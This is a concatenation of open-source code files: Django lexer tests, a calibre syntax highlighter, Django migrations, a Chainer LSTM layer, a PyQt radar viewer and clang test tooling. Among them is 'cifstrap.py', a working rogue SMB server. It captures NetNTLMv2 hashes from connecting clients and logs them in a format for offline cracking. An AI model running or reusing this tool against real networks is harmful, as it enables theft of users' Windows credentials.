"id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
"id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
"id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""", # NOQA
"punct }", "punct ;"
]),
("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
str = '"';
""", # NOQA
["id rexl", "punct .", "id re", "punct =", "punct {",
"id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
"id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""",
"punct ,",
"id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
"id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
"id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""", # NOQA
"punct }", "punct ;",
"id str", "punct =", """string '"'""", "punct ;",
]),
(r""" this._js = "e.str(\"" + this.value.replace(/\\/g, "\\\\").replace(/"/g, "\\\"") + "\")"; """,
["keyword this", "punct .", "id _js", "punct =", r'''string "e.str(\""''', "punct +", "keyword this",
"punct .", "id value", "punct .", "id replace", "punct (", r"regex /\\/g", "punct ,", r'string "\\\\"',
"punct )",
"punct .", "id replace", "punct (", r'regex /"/g', "punct ,", r'string "\\\""', "punct )", "punct +",
r'string "\")"', "punct ;"]),
]
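# A factory function is used here (and again for GETTEXT_CASES below) so that
# each generated test method closes over its own (input, toks) pair rather
# than the shared loop variables, sidestepping Python's late-binding-closure
# pitfall.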
def make_function(input, toks):
def test_func(self):
lexer = JsLexer()
result = ["%s %s" % (name, tok) for name, tok in lexer.lex(input) if name != 'ws']
self.assertListEqual(result, toks)
return test_func
for i, (input, toks) in enumerate(JsTokensTest.LEX_CASES):
setattr(JsTokensTest, "test_case_%d" % i, make_function(input, toks))
GETTEXT_CASES = (
(
r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
""",
r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
"""
), (
r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
""",
r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
"""
), (
r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
""",
r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
"""
), (
r"""
s = "Hello \"th/foo/ere\"";
s = 'He\x23llo \'th/foo/ere\'';
s = 'slash quote \", just quote "';
""",
r"""
s = "Hello \"th/foo/ere\"";
s = "He\x23llo \'th/foo/ere\'";
s = "slash quote \", just quote \"";
"""
), (
r"""
s = "Line continuation\
continued /hello/ still the string";/hello/;
""",
r"""
s = "Line continuation\
continued /hello/ still the string";"REGEX";
"""
), (
r"""
var regex = /pattern/;
var regex2 = /matter/gm;
var regex3 = /[*/]+/gm.foo("hey");
""",
r"""
var regex = "REGEX";
var regex2 = "REGEX";
var regex3 = "REGEX".foo("hey");
"""
), (
r"""
for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}
""",
r"""
for (var x = a in foo && "</x>" || mot ? z:"REGEX"/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y<"REGEX") {xyz(x++);}
"""
), (
"""
\\u1234xyz = gettext('Hello there');
""", r"""
Uu1234xyz = gettext("Hello there");
"""
)
)
class JsToCForGettextTest(SimpleTestCase):
pass
def make_function(js, c):
def test_func(self):
self.assertMultiLineEqual(prepare_js_for_gettext(js), c)
return test_func
for i, pair in enumerate(GETTEXT_CASES):
setattr(JsToCForGettextTest, "test_case_%d" % i, make_function(*pair))
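# A minimal sketch (the leading underscore keeps it out of test collection;
# the inputs are illustrative) of driving the two utilities under test
# directly, outside the generated test methods:
def _demo_jslex_and_gettext():
    lexer = JsLexer()
    tokens = [(name, tok) for name, tok in lexer.lex("var re = /a+/g;")]
    rewritten = prepare_js_for_gettext('var s = gettext("hi"); var r = /x/;')
    return tokens, rewritten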
| bsd-3-clause |
ashang/calibre | src/calibre/gui2/tweak_book/editor/syntax/javascript.py | 14 | 3917 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
import re
from pygments.lexer import RegexLexer, default, include
from pygments.token import Comment, Punctuation, Number, Keyword, Text, String, Operator, Name
import pygments.unistring as uni
from calibre.gui2.tweak_book.editor.syntax.pygments_highlighter import create_highlighter
JS_IDENT_START = ('(?:[$_' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl') +
']|\\\\u[a-fA-F0-9]{4})')
JS_IDENT_PART = ('(?:[$' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl',
'Mn', 'Mc', 'Nd', 'Pc') +
u'\u200c\u200d]|\\\\u[a-fA-F0-9]{4})')
JS_IDENT = JS_IDENT_START + '(?:' + JS_IDENT_PART + ')*'
class JavascriptLexer(RegexLexer):
"""
For JavaScript source code. This is based on the pygments JS highlighter,
    but that does not handle multi-line comments in streaming mode, so we had to
modify it.
"""
flags = re.UNICODE | re.MULTILINE
tokens = {
b'commentsandwhitespace': [
(r'\s+', Text),
(r'<!--', Comment),
(r'//.*?$', Comment.Single),
(r'/\*', Comment.Multiline, b'comment')
],
b'comment': [
(r'[^*/]+', Comment.Multiline),
(r'\*/', Comment.Multiline, b'#pop'),
(r'[*/]', Comment.Multiline),
],
b'slashstartsregex': [
include(b'commentsandwhitespace'),
(r'/(\\.|[^[/\\\n]|\[(\\.|[^\]\\\n])*])+/'
r'([gim]+\b|\B)', String.Regex, b'#pop'),
(r'(?=/)', Text, (b'#pop', b'badregex')),
default(b'#pop')
],
b'badregex': [
(r'\n', Text, b'#pop')
],
b'root': [
(r'\A#! ?/.*?\n', Comment), # shebang lines are recognized by node.js
(r'^(?=\s|/|<!--)', Text, b'slashstartsregex'),
include(b'commentsandwhitespace'),
(r'\+\+|--|~|&&|\?|:|\|\||\\(?=\n)|'
r'(<<|>>>?|==?|!=?|[-<>+*%&|^/])=?', Operator, b'slashstartsregex'),
(r'[{(\[;,]', Punctuation, b'slashstartsregex'),
(r'[})\].]', Punctuation),
(r'(for|in|while|do|break|return|continue|switch|case|default|if|else|'
r'throw|try|catch|finally|new|delete|typeof|instanceof|void|yield|'
r'this)\b', Keyword, b'slashstartsregex'),
(r'(var|let|with|function)\b', Keyword.Declaration, b'slashstartsregex'),
(r'(abstract|boolean|byte|char|class|const|debugger|double|enum|export|'
r'extends|final|float|goto|implements|import|int|interface|long|native|'
r'package|private|protected|public|short|static|super|synchronized|throws|'
r'transient|volatile)\b', Keyword.Reserved),
(r'(true|false|null|NaN|Infinity|undefined)\b', Keyword.Constant),
(r'(Array|Boolean|Date|Error|Function|Math|netscape|'
r'Number|Object|Packages|RegExp|String|sun|decodeURI|'
r'decodeURIComponent|encodeURI|encodeURIComponent|'
r'Error|eval|isFinite|isNaN|parseFloat|parseInt|document|this|'
r'window)\b', Name.Builtin),
(JS_IDENT, Name.Other),
(r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
(r'0x[0-9a-fA-F]+', Number.Hex),
(r'[0-9]+', Number.Integer),
(r'"(\\\\|\\"|[^"])*"', String.Double),
(r"'(\\\\|\\'|[^'])*'", String.Single),
]
}
Highlighter = create_highlighter('JavascriptHighlighter', JavascriptLexer)
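# A minimal sketch of tokenizing a snippet with the lexer directly; it relies
# only on the standard pygments Lexer.get_tokens() API, so the streaming
# multi-line-comment handling above can be exercised without the editor:
def _demo_lex(code='/* multi\n line */ var re = /a+/g;'):
    return list(JavascriptLexer().get_tokens(code))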
if __name__ == '__main__':
from calibre.gui2.tweak_book.editor.widget import launch_editor
launch_editor(P('viewer/images.js'), syntax='javascript')
| gpl-3.0 |
gartung/dxr | dxr/plugins/python/tests/test_imports/test_imports.py | 9 | 2924 | from dxr.testing import DxrInstanceTestCase
class ImportTests(DxrInstanceTestCase):
def test_bases_from_import(self):
"""Make sure the bases: filter matches base classes imported
from another file using `from x import y`.
"""
self.found_line_eq('bases:child.FromImportChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_from_import_alias(self):
"""Make sure the bases: filter matches base classes imported
from another file using `from x import y as z`.
"""
self.found_line_eq('bases:child.FromImportAsChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_import(self):
"""Make sure the bases: filter matches base classes imported
from another file using `import x`.
"""
self.found_line_eq('bases:child.ImportChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_import_as(self):
"""Make sure the bases: filter matches base classes imported
from another file using `import x as y`.
"""
self.found_line_eq('bases:child.ImportAsChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_bases_relative_import(self):
"""Make sure the bases: filter matches base classes imported
from another file using `from . import x`.
"""
self.found_line_eq('bases:child.RelativeImportChildClass',
'class <b>ParentClass</b>(object):', 1)
def test_derived(self):
"""Make sure the derived: filter matches child classes that
import from another file in a variety of ways.
"""
self.found_lines_eq('derived:parent.ParentClass', [
('class <b>FromImportChildClass</b>(ParentClass):', 8),
('class <b>ImportChildClass</b>(parent.ParentClass):', 12),
('class <b>FromImportAsChildClass</b>(PClass):', 16),
('class <b>ImportAsChildClass</b>(blarent.ParentClass):', 20),
('class <b>RelativeImportChildClass</b>(carent.ParentClass):', 24),
])
# Edge cases for the code in `package`.
def test_submodule_import_from(self):
"""Make sure we handle `from package import submodule` as
well as `import package.submodule`.
"""
self.found_lines_eq('derived:package.submodule.MyClass', [
('class <b>FirstDerivedFromSubmodule</b>(submodule.MyClass):', 4),
('class <b>SecondDerivedFromSubmodule</b>(package.submodule.MyClass):', 9),
])
def test_submodule_name_collision(self):
"""Make sure we handle `from package.sub import sub`."""
self.found_line_eq('derived:package.test_import_name_collision.MyClass',
'class <b>DerivedFromInaccessibleClass</b>(MyClass):', 24)
| mit |
rogerhu/django | django/db/migrations/operations/models.py | 5 | 9571 | from .base import Operation
from django.utils import six
from django.db import models, router
from django.db.models.options import normalize_unique_together
from django.db.migrations.state import ModelState
class CreateModel(Operation):
"""
Create a model's table.
"""
def __init__(self, name, fields, options=None, bases=None):
self.name = name
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
def state_forwards(self, app_label, state):
state.models[app_label, self.name.lower()] = ModelState(app_label, self.name, self.fields, self.options, self.bases)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
app_cache = to_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
app_cache = from_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create model %s" % (self.name, )
def references_model(self, name, app_label=None):
strings_to_check = [self.name]
# Check we didn't inherit from the model
for base in self.bases:
if isinstance(base, six.string_types):
strings_to_check.append(base.split(".")[-1])
# Check we have no FKs/M2Ms with it
for fname, field in self.fields:
if field.rel:
if isinstance(field.rel.to, six.string_types):
strings_to_check.append(field.rel.to.split(".")[-1])
# Now go over all the strings and compare them
for string in strings_to_check:
if string.lower() == name.lower():
return True
return False
def __eq__(self, other):
return (
(self.__class__ == other.__class__) and
(self.name == other.name) and
(self.options == other.options) and
(self.bases == other.bases) and
([(k, f.deconstruct()[1:]) for k, f in self.fields] == [(k, f.deconstruct()[1:]) for k, f in other.fields])
)
class DeleteModel(Operation):
"""
Drops a model's table.
"""
def __init__(self, name):
self.name = name
def state_forwards(self, app_label, state):
del state.models[app_label, self.name.lower()]
def database_forwards(self, app_label, schema_editor, from_state, to_state):
app_cache = from_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
app_cache = to_state.render()
model = app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Delete model %s" % (self.name, )
class RenameModel(Operation):
"""
Renames a model.
"""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
def state_forwards(self, app_label, state):
state.models[app_label, self.new_name.lower()] = state.models[app_label, self.old_name.lower()]
state.models[app_label, self.new_name.lower()].name = self.new_name
del state.models[app_label, self.old_name.lower()]
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.old_name)
new_model = new_app_cache.get_model(app_label, self.new_name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.new_name)
new_model = new_app_cache.get_model(app_label, self.old_name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
def references_model(self, name, app_label=None):
return (
name.lower() == self.old_name.lower() or
name.lower() == self.new_name.lower()
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
class AlterModelTable(Operation):
"""
Renames a model's table
"""
def __init__(self, name, table):
self.name = name
self.table = table
def state_forwards(self, app_label, state):
state.models[app_label, self.name.lower()].options["db_table"] = self.table
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.name)
new_model = new_app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Rename table for %s to %s" % (self.name, self.table)
class AlterUniqueTogether(Operation):
"""
    Changes the value of unique_together to the target one.
Input value of unique_together must be a set of tuples.
"""
def __init__(self, name, unique_together):
self.name = name
unique_together = normalize_unique_together(unique_together)
self.unique_together = set(tuple(cons) for cons in unique_together)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name.lower()]
model_state.options["unique_together"] = self.unique_together
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.name)
new_model = new_app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_unique_together(
new_model,
getattr(old_model._meta, "unique_together", set()),
getattr(new_model._meta, "unique_together", set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Alter unique_together for %s (%s constraints)" % (self.name, len(self.unique_together))
class AlterIndexTogether(Operation):
"""
Changes the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
def __init__(self, name, index_together):
self.name = name
self.index_together = set(tuple(cons) for cons in index_together)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name.lower()]
model_state.options["index_together"] = self.index_together
def database_forwards(self, app_label, schema_editor, from_state, to_state):
old_app_cache = from_state.render()
new_app_cache = to_state.render()
old_model = old_app_cache.get_model(app_label, self.name)
new_model = new_app_cache.get_model(app_label, self.name)
if router.allow_migrate(schema_editor.connection.alias, new_model):
schema_editor.alter_index_together(
new_model,
getattr(old_model._meta, "index_together", set()),
getattr(new_model._meta, "index_together", set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name.lower()
def describe(self):
return "Alter index_together for %s (%s constraints)" % (self.name, len(self.index_together))
| bsd-3-clause |
cemoody/chainer | chainer/links/connection/lstm.py | 2 | 2516 | from chainer.functions.activation import lstm
from chainer import link
from chainer.links.connection import linear
from chainer import variable
class LSTM(link.Chain):
"""Fully-connected LSTM layer.
This is a fully-connected LSTM layer as a chain. Unlike the
:func:`~chainer.functions.lstm` function, which is defined as a stateless
activation function, this chain holds upward and lateral connections as
child links.
It also maintains *states*, including the cell state and the output
at the previous time step. Therefore, it can be used as a *stateful LSTM*.
Args:
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of output vectors.
Attributes:
upward (chainer.links.Linear): Linear layer of upward connections.
lateral (chainer.links.Linear): Linear layer of lateral connections.
c (chainer.Variable): Cell states of LSTM units.
h (chainer.Variable): Output at the previous timestep.
"""
def __init__(self, in_size, out_size):
super(LSTM, self).__init__(
upward=linear.Linear(in_size, 4 * out_size),
lateral=linear.Linear(out_size, 4 * out_size, nobias=True),
)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(LSTM, self).to_cpu()
if self.c is not None:
self.c.to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(LSTM, self).to_gpu(device)
if self.c is not None:
self.c.to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def reset_state(self):
"""Resets the internal state.
It sets None to the :attr:`c` and :attr:`h` attributes.
"""
self.c = self.h = None
def __call__(self, x):
"""Updates the internal state and returns the LSTM outputs.
Args:
x (~chainer.Variable): A new batch from the input sequence.
Returns:
~chainer.Variable: Outputs of updated LSTM units.
"""
lstm_in = self.upward(x)
if self.h is not None:
lstm_in += self.lateral(self.h)
if self.c is None:
xp = self.xp
self.c = variable.Variable(
xp.zeros((len(x.data), self.state_size), dtype=x.data.dtype),
volatile='auto')
self.c, self.h = lstm.lstm(self.c, lstm_in)
return self.h
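def _example_usage():
    # A minimal sketch (hypothetical sizes) of stepping the stateful LSTM
    # over a two-step sequence; it mirrors the Variable construction used in
    # __call__ above and assumes numpy float32 inputs of shape (1, in_size).
    import numpy
    lstm = LSTM(in_size=3, out_size=4)
    lstm.reset_state()
    h = None
    for _ in range(2):
        x = variable.Variable(
            numpy.zeros((1, 3), dtype=numpy.float32), volatile='auto')
        h = lstm(x)
    return h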
| mit |
bwall/BAMF | IntegrationQueue/static/cifstrap.py | 1 | 6896 | import socket
import time
import struct
import sys
import threading
import datetime
def PrintLog(message):
message = "[" + str(datetime.datetime.now()) + "] " + message
print message
f = open("hashlog.txt", "a")
f.write(message + "\n")
f.close()
class Handler(threading.Thread):
def __init__(self, conn, addr):
threading.Thread.__init__(self)
self.conn = conn
self.addr = addr
def run(self):
try:
#get negotiate_protocol_request
negotiate_protocol_request = self.conn.recv(1024)
if not negotiate_protocol_request:
self.conn.close()
return
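            # The Negotiate Protocol request carries a NUL-separated list of
            # requested dialect strings starting at byte offset 40; scan for
            # "NT LM 0.12" so the response can select its index below.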
dialect_location = 40
dialect_index = 0
dialect_name = ""
while dialect_location < negotiate_protocol_request.__len__():
dialect_name = ""
while ord(negotiate_protocol_request[dialect_location]) != 0x00:
if ord(negotiate_protocol_request[dialect_location]) != 0x02:
dialect_name += negotiate_protocol_request[dialect_location]
dialect_location += 1
if dialect_name == "NT LM 0.12":
break
dialect_index += 1
dialect_location += 1
#netbios session service
negotiate_protocol_response = "\x00\x00\x00\x51"
#SMB Header
#Server Component
negotiate_protocol_response += "\xff\x53\x4d\x42"
#SMB Command
negotiate_protocol_response += "\x72"
#NT Status
negotiate_protocol_response += "\x00\x00\x00\x00"
#Flags
negotiate_protocol_response += "\x88"
#Flags2
negotiate_protocol_response += "\x01\xc0"
#Process ID High
negotiate_protocol_response += "\x00\x00"
#Signature
negotiate_protocol_response += "\x00\x00\x00\x00\x00\x00\x00\x00"
#Reserved
negotiate_protocol_response += "\x00\x00"
#Tree ID
negotiate_protocol_response += negotiate_protocol_request[28] + negotiate_protocol_request[29]
#Process ID
negotiate_protocol_response += negotiate_protocol_request[30] + negotiate_protocol_request[31]
#User ID
negotiate_protocol_response += negotiate_protocol_request[32] + negotiate_protocol_request[33]
#Multiplex ID
negotiate_protocol_response += negotiate_protocol_request[34] + negotiate_protocol_request[35]
#Negotiate Protocol Response
#Word Count
negotiate_protocol_response += "\x11"
#Dialect Index
negotiate_protocol_response += chr(dialect_index) + "\x00"
#Security Mode
negotiate_protocol_response += "\x03"
#Max Mpx Count
negotiate_protocol_response += "\x02\x00"
#Max VCs
negotiate_protocol_response += "\x01\x00"
#Max Buffer Size
negotiate_protocol_response += "\x04\x11\x00\x00"
#Max Raw Buffer
negotiate_protocol_response += "\x00\x00\x01\x00"
#Session Key
negotiate_protocol_response += "\x00\x00\x00\x00"
#Capabilities
negotiate_protocol_response += "\xfd\xe3\x00\x00"
#System Time
            negotiate_protocol_response += "\x00" * 8  # struct.pack('L', long(time.time()) * 1000L)
#UTC Offset in minutes
negotiate_protocol_response += "\x00\x00"
#Key Length
negotiate_protocol_response += "\x08"
#Byte Count
negotiate_protocol_response += "\x0c\x00"
#Encryption Key
negotiate_protocol_response += "\x11\x22\x33\x44\x55\x66\x77\x88"
#Primary Domain
negotiate_protocol_response += "\x00\x00"
#Server
negotiate_protocol_response += "\x00\x00"
self.conn.sendall(negotiate_protocol_response)
for x in range(0, 2):
ntlmssp_request = self.conn.recv(1024)
if ntlmssp_request.__len__() < 89 + 32 + 8 + 16:
continue
hmac = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89, 89 + 16))
header = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 16, 89 + 20))
challenge = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 24, 89 + 32 + 8))
tail = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 32 + 8, 89 + 32 + 8 + 16))
tindex = 89 + 32 + 8 + 16 + 1
account = ""
while ord(ntlmssp_request[tindex]) != 0x00:
account += chr(ord(ntlmssp_request[tindex]))
tindex += 2
tindex += 2
domain = ""
while ord(ntlmssp_request[tindex]) != 0x00:
domain += chr(ord(ntlmssp_request[tindex]))
tindex += 2
PrintLog(account + "::" + domain + ":1122334455667788:" + hmac + ":" + header + "00000000" + challenge + tail)
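                # The logged line is in NetNTLMv2 format
                # (user::domain:server_challenge:HMAC:blob), which cracking
                # tools such as John the Ripper (netntlmv2) and hashcat
                # (mode 5600) consume directly.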
#netbios session service
ntlmssp_failed = "\x00\x00\x00\x23"
#SMB Header
#Server Component
ntlmssp_failed += "\xff\x53\x4d\x42"
#SMB Command
ntlmssp_failed += "\x73"
#NT Status
ntlmssp_failed += "\x6d\x00\x00\xc0"
#Flags
ntlmssp_failed += "\x88"
#Flags2
ntlmssp_failed += "\x01\xc8"
                #Process ID High
ntlmssp_failed += "\x00\x00"
#Signature
ntlmssp_failed += "\x00\x00\x00\x00\x00\x00\x00\x00"
#Reserved
ntlmssp_failed += "\x00\x00"
#Tree ID
ntlmssp_failed += ntlmssp_request[28] + ntlmssp_request[29]
#Process ID
ntlmssp_failed += ntlmssp_request[30] + ntlmssp_request[31]
#User ID
ntlmssp_failed += ntlmssp_request[32] + ntlmssp_request[33]
#Multiplex ID
ntlmssp_failed += ntlmssp_request[34] + ntlmssp_request[35]
#Negotiate Protocol Response
#Word Count
ntlmssp_failed += "\x00\x00\x00"
self.conn.sendall(ntlmssp_failed)
self.conn.close()
except:
pass
HOST = ''
PORT = 445
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
while True:
conn, addr = s.accept()
PrintLog('Connected by' + str(addr))
handler = Handler(conn, addr)
handler.start()
| mit |
heistermann/wradvis | wradvis/gui.py | 1 | 3615 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, wradlib Development Team. All Rights Reserved.
# Distributed under the MIT License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
#!/usr/bin/env python
from PyQt4 import QtGui, QtCore
# other wradvis imports
from wradvis.glcanvas import RadolanWidget
from wradvis.mplcanvas import MplWidget
from wradvis.properties import PropertiesWidget
from wradvis import utils
from wradvis.config import conf
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.resize(825, 500)
self.setWindowTitle('RADOLAN Viewer')
self._need_canvas_refresh = False
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.reload)
# initialize RadolanCanvas
self.rwidget = RadolanWidget()
self.iwidget = self.rwidget
# initialize MplWidget
self.mwidget = MplWidget()
# canvas swapper
self.swapper = []
self.swapper.append(self.rwidget)
self.swapper.append(self.mwidget)
# need some tracer for the mouse position
self.rwidget.canvas.mouse_moved.connect(self.mouse_moved)
self.rwidget.canvas.key_pressed.connect(self.keyPressEvent)
# add PropertiesWidget
self.props = PropertiesWidget()
self.props.signal_slider_changed.connect(self.slider_changed)
self.props.signal_playpause_changed.connect(self.start_stop)
self.props.signal_speed_changed.connect(self.speed)
# add Horizontal Splitter and the three widgets
self.splitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
self.splitter.addWidget(self.props)
self.splitter.addWidget(self.swapper[0])
self.splitter.addWidget(self.swapper[1])
self.swapper[1].hide()
self.setCentralWidget(self.splitter)
# finish init
self.slider_changed()
def reload(self):
if self.props.slider.value() == self.props.slider.maximum():
self.props.slider.setValue(1)
else:
self.props.slider.setValue(self.props.slider.value() + 1)
def start_stop(self):
if self.timer.isActive():
self.timer.stop()
else:
self.timer.start()
def speed(self):
self.timer.setInterval(self.props.speed.value())
def slider_changed(self):
try:
self.data, self.meta = utils.read_radolan(self.props.filelist[self.props.actualFrame])
except IndexError:
print("Could not read any data.")
else:
scantime = self.meta['datetime']
self.props.sliderLabel.setText(scantime.strftime("%H:%M"))
self.props.date.setText(scantime.strftime("%Y-%m-%d"))
self.iwidget.set_data(self.data)
def mouse_moved(self, event):
self.props.show_mouse(self.rwidget.canvas._mouse_position)
def keyPressEvent(self, event):
if isinstance(event, QtGui.QKeyEvent):
text = event.text()
else:
text = event.text
if text == 'c':
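            # 'c' swaps the visible canvas between the OpenGL (vispy) radolan
            # widget and the matplotlib widget.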
self.swapper = self.swapper[::-1]
self.iwidget = self.swapper[0]
self.swapper[0].show()
self.swapper[1].hide()
def start(arg):
appQt = QtGui.QApplication(arg.argv)
win = MainWindow()
win.show()
appQt.exec_()
if __name__ == '__main__':
print('wradview: Calling module <gui> as main...')
| mit |
jeltz/rust-debian-package | src/llvm/tools/clang/utils/analyzer/SATestAdd.py | 48 | 3075 | #!/usr/bin/env python
"""
Static Analyzer qualification infrastructure: adding a new project to
the Repository Directory.
Add a new project for testing: build it and add to the Project Map file.
Assumes it's being run from the Repository Directory.
The project directory should be added inside the Repository Directory and
have the same name as the project ID
The project should use the following files for set up:
- pre_run_static_analyzer.sh - prepare the build environment.
Ex: make clean can be a part of it.
- run_static_analyzer.cmd - a list of commands to run through scan-build.
Each command should be on a separate line.
Choose from: configure, make, xcodebuild
"""
import SATestBuild
import os
import csv
import sys
def isExistingProject(PMapFile, projectID) :
PMapReader = csv.reader(PMapFile)
for I in PMapReader:
if projectID == I[0]:
return True
return False
# Add a new project for testing: build it and add to the Project Map file.
# Params:
# Dir is the directory where the sources are.
# ID is a short string used to identify a project.
def addNewProject(ID, BuildMode) :
CurDir = os.path.abspath(os.curdir)
Dir = SATestBuild.getProjectDir(ID)
if not os.path.exists(Dir):
print "Error: Project directory is missing: %s" % Dir
sys.exit(-1)
# Build the project.
SATestBuild.testProject(ID, BuildMode, IsReferenceBuild=True, Dir=Dir)
# Add the project ID to the project map.
ProjectMapPath = os.path.join(CurDir, SATestBuild.ProjectMapFile)
if os.path.exists(ProjectMapPath):
PMapFile = open(ProjectMapPath, "r+b")
else:
print "Warning: Creating the Project Map file!!"
PMapFile = open(ProjectMapPath, "w+b")
try:
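        # isExistingProject() reads the CSV to EOF, so when the ID is new the
        # writerow() below appends a fresh record at the end of the file.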
if (isExistingProject(PMapFile, ID)) :
print >> sys.stdout, 'Warning: Project with ID \'', ID, \
'\' already exists.'
print >> sys.stdout, "Reference output has been regenerated."
else:
PMapWriter = csv.writer(PMapFile)
PMapWriter.writerow( (ID, int(BuildMode)) );
print "The project map is updated: ", ProjectMapPath
finally:
PMapFile.close()
# TODO: Add an option not to build.
